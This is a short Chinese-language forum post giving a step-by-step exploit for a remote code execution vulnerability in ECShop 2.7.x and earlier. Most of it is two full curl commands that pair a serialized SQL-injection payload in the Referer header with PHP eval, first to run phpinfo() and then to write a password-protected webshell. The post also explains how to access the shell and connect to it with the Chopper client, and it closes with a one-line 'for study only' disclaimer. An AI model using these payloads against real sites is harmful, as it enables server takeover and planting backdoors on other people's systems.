ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用
搭建环境如图,我们搭建了一个ecshop的环境
发送 Payload 执行 phpinfo();
在终端中输入
curl http://你的ip/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'
发送 Paylod 写入 webshell
在终端中执行
curl http://你的ip/user.php -d 'action=login&vulnspy=eval(base64_decode($_POST));exit;&d=ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOz8%2BJyk7' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'
成功获取webshell
执行成功后会自动生成 http://你的ip/vulnspy.php 文件,密码为 vulnspy。
访问:http://你的ip/vulnspy.php?vulnspy=phpinfo();
菜刀连接
本次教程 仅供学习使用。请勿使用非法用途!
页:
[1]